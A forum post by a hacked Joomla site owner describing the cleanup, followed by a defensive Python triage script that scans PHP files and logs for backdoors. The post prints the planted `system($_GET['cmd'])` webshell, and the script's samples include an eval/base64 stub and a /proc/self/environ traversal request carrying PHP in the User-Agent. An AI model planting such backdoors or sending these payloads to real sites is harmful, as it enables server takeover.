A Joomla site I'm running was hacked the other day. The hacker dropped some files into the tmp directory and was running an HTTP daemon there somehow (at least that's what my host told me). At any rate, I've been trying to clean up the files they left behind and secure what I can, but in checking my logs I noticed a hit on www.domain.com/?cmd=ls. This seemed strange to me, so I tried it... and lo and behold it lists all the files in the root directory of my site. Can someone explain to me why this is happening and how I stop it? This seems like a huge exploit, which I'd like to eliminate immediately.
Update: In digging I noticed a few extra lines added to my Joomla index.php:
if ($_GET['cmd']!=null) {
    system($_GET['cmd']); // runs whatever shell command is passed in ?cmd=
}
I've removed these, but am curious to know how the attacker managed to edit these to begin with. Not really sure where to look to make sure I've closed any back doors.
More Updates: First let me say that yes, I realize the proper course of action here is to blow the site away and restore from backup. However I'd prefer to leave that as a last resort since (a) it's a site that depends on community contributions and my backups aren't that recent (my fault, I know) and (b) I'm working on a new version that should be ready soon. But since I seem to be getting some assistance here I'll add some of the other things that I found/did in an attempt to fix this situation.
Found a .kin (or something like that; I didn't make a note of it and deleted it right away) directory in my /tmp folder, which was obviously where this HTTP daemon was running from. I'm assuming that the gunzip (mentioned below) was how this was placed there.
In my error_log files I found the following suspect entries (the "..." is my attempt to remove the path/filenames from this post):
[04-Jul-2010 09:45:58] PHP Fatal error: Class 'CkformsController../../../../../../../../../../../../../../../proc/self/environ' not found in ... on line 24
[05-Jul-2010 12:31:30] PHP Notice: Undefined index: HTTP_USER_AGENT in ... on line 92
[04-Jul-2010 06:41:52] PHP Warning: rmdir(...) [<a href='function.rmdir'>function.rmdir</a>]: Directory not empty in ... on line 1719
I've updated the CKForms component (which was listed as having a known exploit with the version I was running), as well as another component listed in the HTTP_USER_AGENT message.
In my stat logs I found that the same IP address attempted the ?cmd=ls twice, so I blocked that IP (somewhere in Indonesia).
I updated my Joomla installation to the latest.
I found system.ph and system.php files in my root containing a gunzip/base64-encoded string; I deleted them.
I've gone through all of the directories within the installation where the timestamp is recent to see if any abnormal files exist.
Deleted a cron job pointing to .../tmp/.kin/up2you >/dev/null 2>&1
Also, I'd be concerned that even if I did restore from a backup, whatever exploit used would still exist, so root cause and prevention is really what I'm going for here.
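As an added example (not part of the original post, and not code from Joomla or CKForms), here is a small Python triage script that checks for the two kinds of evidence this post turned up: backdoor code like the `system($_GET['cmd'])` lines found in index.php and the gunzip/base64 blob in system.php, and log entries like the `?cmd=ls` probe and the `../../proc/self/environ` traversal in the error_log. The signatures are heuristics, the log format is Apache combined, and every sample file and log line below is constructed for the example (client IPs are from the 203.0.113.0/24 documentation range). The `controller=` parameter and `%00` suffix in the sample request are assumptions modeled on the `CkformsController../../...` error above, not a verified exploit URL.

```python
"""Post-compromise triage for a PHP/Joomla site: flag backdoor code in PHP
sources and suspicious requests in access/error logs.

Heuristics only (assumption: they catch the patterns described in the post,
not every possible webshell). All sample inputs below are constructed.
"""
import re
from typing import List, Set, Tuple

# Signatures for the kind of code the post describes: a shell function fed
# straight from request input, and gunzip/base64-wrapped blobs run via eval.
PHP_BACKDOOR_SIGNATURES: List[Tuple[str, re.Pattern]] = [
    ("shell function fed from request input",
     re.compile(r"\b(system|exec|shell_exec|passthru|popen|proc_open)"
                r"\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b")),
    ("eval of decoded/decompressed blob",
     re.compile(r"\beval\s*\(\s*(gzinflate|gzuncompress|gzdecode|base64_decode|str_rot13)\s*\(")),
    ("long base64 literal",
     re.compile(r"base64_decode\s*\(\s*['\"][A-Za-z0-9+/=]{60,}")),
]


def scan_php_source(source: str) -> List[Tuple[int, str]]:
    """Return (line_number, description) for every signature hit in a PHP file."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for desc, pat in PHP_BACKDOOR_SIGNATURES:
            if pat.search(line):
                hits.append((lineno, desc))
    return hits


# Request indicators: the ?cmd= probe, the ../../proc/self/environ traversal
# (also in the form it takes in the PHP error_log), and PHP code carried in a
# header such as User-Agent, which is how a /proc/self/environ include gets a payload.
LOG_INDICATORS: List[Tuple[str, re.Pattern]] = [
    ("cmd parameter", re.compile(r"[?&]cmd=")),
    ("proc/self/environ traversal",
     re.compile(r"(\.\./|%2e%2e%2f){2,}.*proc/self/environ", re.IGNORECASE)),
    ("php code in request", re.compile(r"<\?(php|=)", re.IGNORECASE)),
]

IP_AT_LINE_START = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3})\s")


def scan_log_lines(lines: List[str]) -> List[Tuple[int, List[str], str]]:
    """Return (line_number, matched indicators, line) for each suspicious log line."""
    flagged = []
    for lineno, line in enumerate(lines, start=1):
        matched = [desc for desc, pat in LOG_INDICATORS if pat.search(line)]
        if matched:
            flagged.append((lineno, matched, line))
    return flagged


def source_ips(flagged: List[Tuple[int, List[str], str]]) -> Set[str]:
    """Client IPs from flagged access-log lines (error_log lines carry none)."""
    ips = set()
    for _, _, line in flagged:
        m = IP_AT_LINE_START.match(line)
        if m:
            ips.add(m.group(1))
    return ips


# --- constructed samples (not the poster's real files or logs) ---
BACKDOORED_INDEX_PHP = """<?php
define('_JEXEC', 1);
if ($_GET['cmd']!=null) {
system($_GET['cmd']);
}
require_once dirname(__FILE__) . '/includes/framework.php';
"""
CLEAN_INDEX_PHP = """<?php
define('_JEXEC', 1);
require_once dirname(__FILE__) . '/includes/framework.php';
"""
# A dropped file of the system.php type: eval of a gunzip'd base64 blob.
DROPPED_SYSTEM_PHP = "<?php eval(gzinflate(base64_decode('" + "eJxLy0" * 12 + "'))); ?>"

SAMPLE_ACCESS_LOG = [
    "203.0.113.7 - - [04/Jul/2010:09:45:58 +0000] \"GET /index.php?option=com_ckforms"
    "&controller=../../../../../../../../proc/self/environ%00 HTTP/1.1\" 200 512 "
    "\"-\" \"<?php system('id'); ?>\"",
    "203.0.113.7 - - [05/Jul/2010:12:31:30 +0000] \"GET /?cmd=ls HTTP/1.1\" 200 2048 "
    "\"-\" \"Mozilla/5.0\"",
    "198.51.100.22 - - [05/Jul/2010:12:32:01 +0000] \"GET /index.php?option=com_content"
    "&view=article&id=5 HTTP/1.1\" 200 9000 \"-\" \"Mozilla/5.0\"",
]
SAMPLE_ERROR_LOG = [
    "[04-Jul-2010 09:45:58] PHP Fatal error: Class 'CkformsController../../../../../../"
    "../../../../proc/self/environ' not found in /var/www/example/components/"
    "com_ckforms/ckforms.php on line 24",
]

if __name__ == "__main__":
    for name, src in [("index.php", BACKDOORED_INDEX_PHP), ("system.php", DROPPED_SYSTEM_PHP)]:
        for lineno, desc in scan_php_source(src):
            print(f"{name}:{lineno}: {desc}")
    flagged = scan_log_lines(SAMPLE_ACCESS_LOG + SAMPLE_ERROR_LOG)
    for lineno, matched, _ in flagged:
        print(f"log line {lineno}: {', '.join(matched)}")
    print("source IPs to investigate:", sorted(source_ips(flagged)))
```

To use it on a real site, feed `scan_php_source` the contents of every .php file under the web root (not just recently modified ones, since timestamps can be reset) and `scan_log_lines` the raw access and error logs. A hit is a starting point for manual inspection; a clean scan says nothing about what lives outside the web root, such as the /tmp daemon and the cron entry mentioned above.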